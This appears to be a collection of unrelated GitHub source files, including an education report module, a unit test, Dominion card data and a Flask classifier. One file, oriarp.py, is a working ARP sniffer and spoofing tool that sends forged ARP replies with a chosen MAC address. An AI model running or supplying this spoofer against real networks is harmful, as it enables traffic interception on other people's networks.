custom metadata\n subject_name = subjects_map[result[\"asmt_subject\"]]\n custom = custom_metadata_map.get(subject_name)\n # format and rearrange cutpoints\n result = get_cut_points(custom, result)\n\n result['claims'] = get_claims(number_of_claims=5, result=result, include_names=True, include_scores=True, include_min_max_scores=True, include_indexer=True)\n result['accommodations'] = get_accommodations(result=result)\n\n new_results.append(result)\n\n # rearranging the json so we could use it more easily with mustache\n for idx, value in enumerate(new_results):\n new_results[idx] = __calculateClaimScoreRelativeDifference(value)\n return {\"all_results\": new_results}\n\n\ndef __arrange_results_iab(results, subjects_map, custom_metadata_map):\n '''\n This method arranges the data retrieved from the db to make it easier to consume by the client\n '''\n iab_results = {}\n if len(results) is 0:\n return iab_results\n first_result = results[0]\n iab_results['student_full_name'] = format_full_name(first_result['first_name'], first_result['middle_name'], first_result['last_name'])\n iab_results['first_name'] = first_result.get('first_name')\n iab_results['middle_name'] = first_result.get('middle_name')\n iab_results['last_name'] = first_result.get('last_name')\n iab_results['asmt_grade'] = first_result.get('asmt_grade')\n iab_results['asmt_type'] = capwords(first_result.get('asmt_type'), ' ')\n iab_results['asmt_period_year'] = first_result.get('asmt_period_year')\n iab_results['student_id'] = first_result.get('student_id')\n\n # Go through each of the different subjects ELA, Math etc.\n subject_data = {}\n for alias in subjects_map.values():\n subject_data[alias] = []\n # Check each DB result against the subject\n for result in results:\n subject_list = {}\n subject = result['asmt_subject']\n subject_list['claims'] = get_claims(number_of_claims=1, result=result, include_names=True, include_scores=False, include_min_max_scores=False, include_indexer=False, include_complete_admin_cond=True)\n subject_list['grade'] = result.get('asmt_grade')\n subject_list['date_taken'] = result.get('date_taken')\n subject_data[subjects_map.get(subject)].append(subject_list)\n # Create map from subject to all value for it's type\n for k, v in subject_data.items():\n iab_results[k] = v\n return {\"all_results\": 
iab_results}\n\n\n@report_config(name=REPORT_NAME,\n params={\n Constants.STATECODE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z]{2}$\"},\n Constants.STUDENTGUID: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASSESSMENTGUID: {\n \"type\": \"string\",\n \"required\": False,\n \"pattern\": \"^[a-zA-Z0-9\\-]{0,50}$\"},\n Constants.ASMTYEAR: {\n \"type\": \"integer\",\n \"required\": True,\n \"pattern\": \"^[1-9][0-9]{3}$\"},\n Constants.DATETAKEN: {\n \"type\": \"integer\",\n \"required\": False,\n \"pattern\": \"^[1-9]{8}$\"},\n Constants.ASMTTYPE: {\n \"type\": \"string\",\n \"required\": True,\n \"pattern\": \"^(\" + AssessmentType.INTERIM_ASSESSMENT_BLOCKS + \"|\" + AssessmentType.SUMMATIVE + \"|\" + AssessmentType.INTERIM_COMPREHENSIVE + \")$\"}\n })\n@validate_user_tenant\n@user_info\n@get_current_request_context\n@audit_event()\ndef get_student_report(params):\n '''\n Individual Student Report\n '''\n student_id = params[Constants.STUDENTGUID]\n state_code = params[Constants.STATECODE]\n academic_year = params.get(Constants.ASMTYEAR)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_type = asmt_type if asmt_type and asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS else None\n\n with EdCoreDBConnection(state_code=state_code) as connection:\n # choose query IAB or other assessment\n query_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __prepare_query_iab, None: __prepare_query}\n # choose arrange results for the client IAB or other assessment\n arrange_function = {AssessmentType.INTERIM_ASSESSMENT_BLOCKS: __arrange_results_iab, None: __arrange_results}\n query = query_function[asmt_type](connection, params)\n result = connection.get_result(query)\n if not result:\n logger.error(\"Individual student report: there are no results for student id : %s\", student_id)\n raise NotFoundException(\"There are no results for student id {0}\".format(student_id))\n records = [record for record in result if record['asmt_period_year'] == academic_year]\n first_student = records[0] if len(records) > 0 else result[0]\n state_code = first_student[Constants.STATE_CODE]\n district_id = first_student[Constants.DISTRICT_ID]\n school_id = first_student[Constants.SCHOOL_ID]\n asmt_grade = first_student['asmt_grade']\n student_name = format_full_name(first_student['first_name'], first_student['middle_name'], first_student['last_name'])\n context = get_breadcrumbs_context(state_code=state_code, district_id=district_id, school_id=school_id, asmt_grade=asmt_grade, student_name=student_name)\n student_report_asmt_administration = get_asmt_administration_years_isr(state_code, student_ids=student_id)\n\n # color metadata\n custom_metadata_map = get_custom_metadata(result[0].get(Constants.STATE_CODE), None)\n # subjects map\n subjects_map = get_subjects_map()\n result = arrange_function[asmt_type](result, subjects_map, custom_metadata_map)\n\n result['context'] = context\n result[Constants.METADATA] = {Constants.BRANDING: custom_metadata_map.get(Constants.BRANDING)}\n result[Constants.SUBJECTS] = {v: k for k, v in subjects_map.items()}\n result['asmt_administration'] = student_report_asmt_administration\n return result\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter/smarter/reports/student_report.py","file_name":"student_report.py","file_ext":"py","file_size_in_byte":24626,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} 
+{"seq_id":"39221250381","text":"import unittest\n\nfrom test.stub_stdout import StubStdout\n\nfrom googkit.commands.command import Command\nfrom googkit.compat.unittest import mock\nfrom googkit.lib.argument import ArgumentParser\nfrom googkit.lib.command_tree import CommandTree\nfrom googkit.lib.help import Help\n\n\nclass TestHelp(unittest.TestCase):\n class OptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set(['--foo', '--bar'])\n\n class NoOptionCommand(Command):\n @classmethod\n def supported_options(cls):\n return set()\n\n def setUp(self):\n CommandTree.DEFAULT_TREE = {\n '0_leaf': TestHelp.NoOptionCommand,\n '0_node': {\n '1_leaf': TestHelp.OptionCommand,\n '1_node': {\n '2_leaf': mock.MagicMock()\n }\n }\n }\n self.tree = CommandTree()\n\n def help_with_args(self, args):\n arg = ArgumentParser.parse(['googkit.py'] + args)\n return Help(self.tree, arg)\n\n def test_is_valid_commands(self):\n help = self.help_with_args(['0_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf'])\n self.assertTrue(help._is_valid_commands())\n\n help = self.help_with_args(['0_node', '1_leaf', 'bluerose'])\n self.assertFalse(help._is_valid_commands())\n\n def test_print_usage(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertFalse(mock_stdout.getvalue().find('') >= 0)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_usage()\n self.assertTrue(mock_stdout.getvalue().find('') >= 0)\n\n def test_print_available_commands(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_commands(None)\n self.assertFalse(mock_stdout.write.called)\n\n help = self.help_with_args(['0_node'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Available commands') >= 0)\n\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_commands(None)\n self.assertTrue(mock_stdout.getvalue().find('Did you mean one of these') >= 0)\n\n def test_similarity(self):\n func = Help.similarity('desp')\n self.assertTrue(func('deps') >= func('build'))\n self.assertTrue(func('') == 0)\n\n def test_candidates(self):\n available_commands = ['build', 'compile', 'deps', 'init', 'lint', 'setup']\n result = Help.candidates(available_commands, 'desp')\n self.assertEqual(result[0], 'deps')\n result = Help.candidates(available_commands, 'int')\n self.assertTrue('init' in result)\n self.assertTrue('lint' in result)\n\n def test_print_available_options(self):\n help = self.help_with_args(['0_node', 'bluerose'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Non-existent command should not print availabe options')\n\n help = 
self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout') as mock_stdout:\n help._print_available_options()\n self.assertFalse(\n mock_stdout.return_value.write.called,\n 'Command that has no supported options should not print available options')\n\n help = self.help_with_args(['0_node', '1_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help._print_available_options()\n self.assertTrue(\n mock_stdout.getvalue().find('Available options') >= 0,\n 'Command that has supported options should print available options')\n\n def test_print_help(self):\n help = self.help_with_args(['0_leaf'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertFalse(mock_stdout.getvalue().find('Invalid command') >= 0)\n\n help = self.help_with_args(['0_leaf', 'bluerose'])\n with mock.patch('sys.stdout', new_callable=StubStdout) as mock_stdout:\n help.print_help()\n self.assertTrue(mock_stdout.getvalue().find('Invalid command') >= 0)\n","repo_name":"googkit/googkit","sub_path":"test/lib/test_help.py","file_name":"test_help.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"32687369500","text":"#!/usr/bin/python3\r\nimport socket\r\nimport struct\r\nimport uuid\r\nimport sys\r\nimport os\r\nimport binascii\r\n\r\n\r\ndef getsocketinformation():\r\n #create socket and receive all type of packets\r\n a_scoket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))\r\n\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n a_scoket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\r\n\r\n a_scoket.bind((os.listdir('/sys/class/net/')[1], 0))\r\n\r\n return a_scoket\r\n\r\ndef getmac():\r\n List = []\r\n Mymac = uuid.getnode()\r\n count = 0\r\n while(count < 6):\r\n List = [Mymac % 0x100] + List\r\n Mymac //= 0x100\r\n count += 1\r\n return List\r\n\r\ndef getpacketinformation():\r\n arpin = {\r\n 'my_mac' : struct.pack('!6B',*getmac()),\r\n 'my_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_type' : struct.pack('!H', 0x0806)\r\n }\r\n packet = {\r\n\r\n #header\r\n 'target_mac_addr' : struct.pack('!6B',0xFF,0xFF,0xFF,0xFF,0xFF,0xFF),\r\n 'source_mac_addr' : struct.pack('!6B',*getmac()),\r\n 'frame_type' : struct.pack('!H',0x0806),\r\n\r\n #arp body\r\n 'arp_body_hw_type' : struct.pack('!H', 0x0001),\r\n 'arp_body_protocal_type' : struct.pack('!H', 0x0800),\r\n 'arp_body_hw_length' : struct.pack('!B', 0x06),\r\n 'arp_body_protocal_length' : struct.pack('!B', 0x04),\r\n 'arp_body_opcode' : struct.pack('!H', 0x0001),\r\n 'arp_body_source_mac' : struct.pack('!6B',*getmac()),\r\n 'arp_body_source_ip' : socket.inet_aton(socket.gethostbyname(socket.gethostname())),\r\n 'arp_body_target_mac' : struct.pack('!6B',0,0,0,0,0,0),\r\n 'arp_body_target_ip' : ''\r\n }\r\n return packet\r\n\r\ndef receive(my_socket):\r\n my_packet = getpacketinformation()\r\n\r\n frame = my_socket.recvfrom(2048)\r\n header = frame[0][0:14]\r\n arp_body = frame[0][14:42]\r\n\r\n header_temp = struct.unpack(\"!6s6s2s\", header)\r\n arp_body_temp = struct.unpack(\"!2s2s1s1s2s6s4s6s4s\", arp_body)\r\n\r\n my_packet['target_mac_addr'] = binascii.hexlify(header_temp[0],':')\r\n my_packet['source_mac_addr'] = binascii.hexlify(header_temp[1],':')\r\n my_packet['frame_type'] = header_temp[2]\r\n\r\n my_packet['arp_body_opcode'] = arp_body_temp[4]\r\n my_packet['arp_body_source_mac'] = 
binascii.hexlify(arp_body_temp[5],':')\r\n my_packet['arp_body_source_ip'] = socket.inet_ntoa(arp_body_temp[6])\r\n my_packet['arp_body_target_mac'] = binascii.hexlify(arp_body_temp[7],':')\r\n my_packet['arp_body_target_ip'] = socket.inet_ntoa(arp_body_temp[8])\r\n\r\n return my_packet\r\n\r\ndef listening():\r\n print(\"### ARP sniffer mode ###\")\r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef Listening(ip):\r\n print(\"### ARP sniffer mode ###\")\r\n \r\n while True:\r\n _Packet = receive(getsocketinformation())\r\n\r\n \r\n if _Packet['frame_type'] != b'\\x08\\x06':\r\n continue\r\n #print(_Packet['arp_body_target_ip'])\r\n #receive target or source is \"ip\" only\r\n if _Packet['arp_body_target_ip'] != ip and _Packet['arp_body_source_ip'] != ip:\r\n continue\r\n\r\n if _Packet['arp_body_opcode'] == b'\\x00\\x01':\r\n print(\"arp request\")\r\n \r\n if _Packet['arp_body_opcode'] == b'\\x00\\x02':\r\n print(\"arp response\")\r\n\r\n print(\"Get ARP packet - Who has \" + _Packet['arp_body_target_ip'] + \" ? Tell \" + _Packet['arp_body_source_ip'])\r\n\r\ndef question(ip):\r\n Arp_packet = getpacketinformation()\r\n Arp_socket = getsocketinformation()\r\n\r\n Arp_packet['arp_body_target_ip'] = socket.inet_aton(ip)\r\n\r\n Arp_packet_list = [ i for i in Arp_packet.values() ]\r\n \r\n\r\n\r\n Arp_packet['arp_body_source_ip'] = socket.inet_ntoa(Arp_packet['arp_body_source_ip'])\r\n Arp_packet['arp_body_target_ip'] = socket.inet_ntoa(Arp_packet['arp_body_target_ip'])\r\n\r\n\r\n\r\n Arp_socket.send(b''.join(Arp_packet_list))\r\n \r\n print(\"Get ARP packet - Who has \" + Arp_packet['arp_body_target_ip'] + \" ? 
Tell \" + Arp_packet['arp_body_source_ip'])\r\n\r\n while True:\r\n Arp_responce = receive(Arp_socket)\r\n\r\n if Arp_responce['frame_type'] != b'\\x08\\x06':\r\n continue\r\n \r\n\r\n if Arp_responce['arp_body_source_ip'] == ip:\r\n print(\"MAC address of \" + Arp_responce['arp_body_source_ip'] + \" is \" + bytes.decode(Arp_responce['arp_body_source_mac']))\r\n break\r\n\r\ndef Spoof(fack_mac , target_ip):\r\n a_scoket = getsocketinformation()\r\n\r\n fack_mac = str.encode(fack_mac)\r\n fack_mac = binascii.unhexlify(fack_mac.replace(b':', b''))\r\n while True:\r\n Arp_request = receive(a_scoket)\r\n\r\n if Arp_request['frame_type'] != b'\\x08\\x06':\r\n continue\r\n\r\n if Arp_request['arp_body_opcode'] != b'\\x00\\x01' or Arp_request['arp_body_target_ip'] != target_ip:\r\n continue\r\n print(\"arp request\")\r\n \r\n print(\"Arp request target ip is \" + Arp_request['arp_body_target_ip'])\r\n\r\n print(\"fack arp responce :\")\r\n\r\n fack_arp_responce = getpacketinformation()\r\n \r\n Arp_request['arp_body_source_mac'] = bytes.decode(Arp_request['arp_body_source_mac'])\r\n Arp_request['arp_body_source_mac'] = Arp_request['arp_body_source_mac'].replace(':','')\r\n\r\n fack_arp_responce['target_mac_addr'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n fack_arp_responce['source_mac_addr'] = fack_mac\r\n fack_arp_responce['arp_body_opcode'] = struct.pack('!H', 0x0002)\r\n fack_arp_responce['arp_body_source_mac'] = fack_mac\r\n fack_arp_responce['arp_body_target_ip'] = socket.inet_aton(Arp_request['arp_body_source_ip'])\r\n fack_arp_responce['arp_body_source_ip'] = socket.inet_aton(target_ip)\r\n fack_arp_responce['arp_body_target_mac'] = binascii.unhexlify(Arp_request['arp_body_source_mac'])\r\n \r\n \r\n fack_arp_responce_list = [ k for k in fack_arp_responce.values() ]\r\n\r\n a_scoket.send(b''.join(fack_arp_responce_list))\r\n print(\"Send successfull.\")\r\n exit()\r\n\r\n\r\n\r\ndef main(run):\r\n if os.geteuid() != 0:\r\n print(\"ERROR: You must be root to use the tool!\")\r\n exit()\r\n\r\n print(\"[ ARP sniffer and spoof program ]\")\r\n\r\n if run[0] == '-help':\r\n print(\"Format :\")\r\n print(\"1) sudo python3 arp.py -l -a\")\r\n print(\"2) sudo python3 arp.py -l \")\r\n print(\"3) sudo python3 -q \")\r\n print(\"4) sudo python3 \")\r\n\r\n elif run == ['-l','-a']:\r\n listening()\r\n\r\n elif run[0] == '-l':\r\n Listening(run[1])\r\n\r\n elif run[0] == '-q':\r\n question(run[1])\r\n\r\n else:\r\n Spoof(run[0],run[1])\r\n \r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv[1:])\r\n\r\n\"\"\"\r\ndef a(n):\r\n code\r\n\r\nb = 10\r\na(b)\r\n\"\"\"\r\n","repo_name":"EnNoYa/EnNoYa.github.io","sub_path":"oriarp.py","file_name":"oriarp.py","file_ext":"py","file_size_in_byte":7300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31807228437","text":"cards = {\n 'adventurer' : {\n 'name':'Adventurer',\n 'set':'Base',\n 'cost':6,\n 'type':'Action',\n 'effects': {\n 'other':'Reveal cards from your deck until you reveal 2 Treasure cards. Put those treasure cards into your hand and discard the other revealed cards'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/adventurer.jpg'\n },\n 'bureaucrat' : {\n 'name':'Bureaucrat',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'other':'Gain a Silver card; put it on top of your deck. 
Each other player reveals a Victory card from their hand and puts it on their deck (or reveals a hand with no Victory cards).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/bureaucrat.jpg'\n },\n 'cellar' : {\n 'name':'Cellar',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'actions':1,\n 'other':'Discard any number of cards. +1 Card per card discarded.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/cellar.jpg'\n },\n 'chancellor' : {\n 'name':'Chancellor',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'coins':2,\n 'other':'You may immediately put your deck into your discard pile.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chancellor.jpg'\n },\n 'chapel' : {\n 'name':'Chapel',\n 'set':'Base',\n 'cost':2,\n 'type':'Action',\n 'effects': {\n 'other':'Trash up to 4 cards from your hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/chapel.jpg'\n },\n 'council_room' : {\n 'name':'Council Room',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':4,\n 'buys':1,\n 'other':'Each other player draws a card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/councilroom.jpg'\n },\n 'feast' : {\n 'name':'Feast',\n 'set':'Base',\n 'cost':4,\n 'type':'Action',\n 'effects': {\n 'other':'Trash this card. Gain a card costing up to 5.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/feast.jpg'\n },\n 'festival' : {\n 'name':'Festival',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'actions':2,\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/festival.jpg'\n },\n 'gardens' : {\n 'name':'Gardens',\n 'set':'Base',\n 'cost':4,\n 'type':'Victory',\n 'effects': {\n 'other':'Worth 1 Victory Point for every 10 cards in your desk (rounded down).'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/gardens.jpg'\n },\n 'laboratory' : {\n 'name':'Laboratory',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':2,\n 'actions':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/laboratory.jpg'\n },\n 'library' : {\n 'name':'Library',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Draw until you have 7 cards in hand. You may set aside any Action cards drawn this way, as you draw them; discard the set aside cards after you finish drawing.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/library.jpg'\n },\n 'market' : {\n 'name':'Market',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':1,\n 'buys':1,\n 'coins':1\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/market.jpg'\n },\n 'militia' : {\n 'name':'Militia',\n 'set':'Base',\n 'cost':4,\n 'type':'Action - Attack',\n 'effects': {\n 'coins':2,\n 'other':'Each other player discards down to 3 cards in their hand.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/militia.jpg'\n },\n 'mine' : {\n 'name':'Mine',\n 'set':'Base',\n 'cost':5,\n 'type':'Action',\n 'effects': {\n 'other':'Trash a Treasure card from your hand. 
Gain a Treasure card costing up to 3 more; put it into your hand.'\n        },\n        'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/mine.jpg'\n    },\n    'moat' : {\n        'name':'Moat',\n        'set':'Base',\n        'cost':2,\n        'type':'Action - Reaction',\n        'effects': {\n            'cards':2,\n            'other':'When another player plays an Attack card, you may reveal this from your hand. If you do so, you are unaffected by that Attack.'\n        },\n        'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moat.jpg'\n    },\n    'moneylender' : {\n        'name':'Moneylender',\n        'set':'Base',\n        'cost':4,\n        'type':'Action',\n        'effects': {\n            'other':'Trash a Copper card from your hand. If you do, +3 treasures.'\n        },\n        'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/moneylender.jpg'\n    },\n    'remodel' : {\n        'name':'Remodel',\n        'set':'Base',\n        'cost':4,\n        'type':'Action',\n        'effects': {\n            'other':'Trash a card from your hand. Gain a card costing up to 2 more than the trashed card.'\n        },\n        'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/remodel.jpg'\n    },\n    'smithy' : {\n        'name':'Smithy',\n        'set':'Base',\n        'cost':4,\n        'type':'Action',\n        'effects': {\n            'cards':3\n        },\n        'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/smithy.jpg'\n    },\n    'spy' : {\n        'name':'Spy',\n        'set':'Base',\n        'cost':4,\n        'type':'Action - Attack',\n        'effects': {\n            'cards':1,\n            'actions':1,\n            'other':'Each player (including you) reveals the top card of their deck and either discards it or puts it back, your choice.'\n        },\n        'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/spy.jpg'\n    },\n    'thief' : {\n        'name':'Thief',\n        'set':'Base',\n        'cost':4,\n        'type':'Action - Attack',\n        'effects': {\n            'other':'Each other player reveals the top 2 cards of their deck. If they revealed any Treasure cards, they trash one of them that you choose. You may gain any or all of these trashed cards. They discard the other revealed cards.'\n        },\n        'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/thief.jpg'\n    },\n    'throne_room' : {\n        'name':'Throne Room',\n        'set':'Base',\n        'cost':4,\n        'type':'Action',\n        'effects': {\n            'other':'Choose an Action card in your hand. 
Play it twice.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/throneroom.jpg'\n },\n 'village' : {\n 'name':'Village',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'cards':1,\n 'actions':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/village.jpg'\n },\n 'witch' : {\n 'name':'Witch',\n 'set':'Base',\n 'cost':5,\n 'type':'Action - Attack',\n 'effects': {\n 'cards':2,\n 'other':'Each other player gains a Curse card.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/witch.jpg'\n },\n 'woodcutter' : {\n 'name':'Woodcutter',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'buys':1,\n 'coins':2\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/woodcutter.jpg'\n },\n 'workshop' : {\n 'name':'Workshop',\n 'set':'Base',\n 'cost':3,\n 'type':'Action',\n 'effects': {\n 'other':'Gain a card costing up to 4 treasures.'\n },\n 'image':'http://www.dominiondeck.com/sites/default/files/imagecache/cards-landing/cards/workshop.jpg'\n },\n 'copper' : {\n 'name':'Copper',\n 'set':'Base',\n 'cost':0,\n 'type':'Treasure',\n 'effects': {\n 'coins':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/copper.jpg'\n },\n 'silver' : {\n 'name':'Silver',\n 'set':'Base',\n 'cost':3,\n 'type':'Treasure',\n 'effects': {\n 'coins':2\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/silver.jpg'\n },\n 'gold' : {\n 'name':'Gold',\n 'set':'Base',\n 'cost':6,\n 'type':'Treasure',\n 'effects': {\n 'coins':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/gold.jpg'\n },\n 'estate' : {\n 'name':'Estate',\n 'set':'Base',\n 'cost':2,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/estate.jpg'\n },\n 'duchy' : {\n 'name':'Duchy',\n 'set':'Base',\n 'cost':5,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':3\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/duchy.jpg'\n },\n 'province' : {\n 'name':'Province',\n 'set':'Base',\n 'cost':8,\n 'type':'Victory',\n 'effects': {\n 'victorypoints':6\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/province.jpg'\n },\n 'curse' : {\n 'name':'Curse',\n 'set':'Base',\n 'type':'Curse',\n 'effects': {\n 'victorypoints':-1\n },\n 'image':'http://dominion.diehrstraits.com/scans/common/curse.jpg'\n },\n}\n\ndecks = {\n 'first-game' : [\n 'cellar',\n 'market',\n 'militia',\n 'mine',\n 'moat',\n 'remodel',\n 'smithy',\n 'village',\n 'woodcutter',\n 'workshop',\n ],\n 'big-money' : [\n 'adventurer',\n 'bureaucrat',\n 'chancellor',\n 'chapel',\n 'feast',\n 'laboratory',\n 'market',\n 'mine',\n 'moneylender',\n 'throne_room',\n ],\n 'interaction' : [\n 'bureaucrat',\n 'chancellor',\n 'council_room',\n 'festival',\n 'library',\n 'militia',\n 'moat',\n 'spy',\n 'thief',\n 'village',\n ],\n 'size-distortion' : [\n 'cellar',\n 'chapel',\n 'feast',\n 'gardens',\n 'laboratory',\n 'thief',\n 'village',\n 'witch',\n 'woodcutter',\n 'workshop',\n ],\n 'village-square' : [\n 'bureaucrat',\n 'cellar',\n 'festival',\n 'library',\n 'market',\n 'remodel',\n 'smithy',\n 'throne_room',\n 'village',\n 'woodcutter',\n 
],\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aaron-zeisler/dominion","sub_path":"dominion/dominion_data.py","file_name":"dominion_data.py","file_ext":"py","file_size_in_byte":12016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16851974383","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 2 18:15:39 2019\n\n@author: Mr Mejia\n\"\"\"\n\nfrom flask import Flask, jsonify, request\nfrom sklearn.externals import joblib\nfrom iswai.sensor_mongodb import SensorMongoDB\n\napp = Flask(__name__)\n\n@app.route('/classify/<float:hm>/<float:tm>')\ndef classify(hm, tm):\n\n    # Load the saved iris classification model\n    model = joblib.load('models/sensor_svc.model')\n\n    # Make predictions on request data\n    data = [hm, tm]\n    predictions = model.predict([data])\n\n    # return the classification in JSON format\n    return jsonify({'clima':predictions[0]})\n\n@app.route('/classify', methods=['POST'])\ndef classify_json():\n    # Load the saved iris classification model\n    model = joblib.load('models/sensor_svc.model')\n\n    content = request.get_json()\n\n    data = []\n    for row in content:\n        tm = row['tm']\n        hm = row['hm']\n        item = [tm, hm]\n        data.append(item)\n\n    # Make Predictions\n    predictions = model.predict(data)\n\n    # Return the classification in JSON format\n    return jsonify(clima=predictions[0])\n\n\n@app.route('/list', methods=['GET'])\ndef list():\n    # Load the saved iris classification model\n    model = joblib.load('models/sensor_svc.model')\n\n    sensor_mongodb = SensorMongoDB()\n    dataframe = sensor_mongodb.getDataframe()\n    print(dataframe)\n\n    json_data = []\n\n    for index, row in dataframe.iterrows():\n        tm = row['temperatura']\n        hm = row['humedad']\n        item = [tm, hm]\n\n        category = model.predict([item])[0]\n        json_item = {'tm':tm, 'hm':hm, 'clima':category}\n        json_data.append(json_item)\n\n    return jsonify(Tiempo=json_data)\n\nif __name__ == '__main__':\n    app.run()","repo_name":"DuvanSGF/Sifunciona","sub_path":"DataScienceII/ClasesGithub/Nueva carpeta/sensor/iswai/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12657131896","text":"x=int(input())\nflag=True\ncnt=0\nwhile flag:\n    for i in range(2,int(x**0.5)+1):\n        if x%i!=0:\n            continue\n        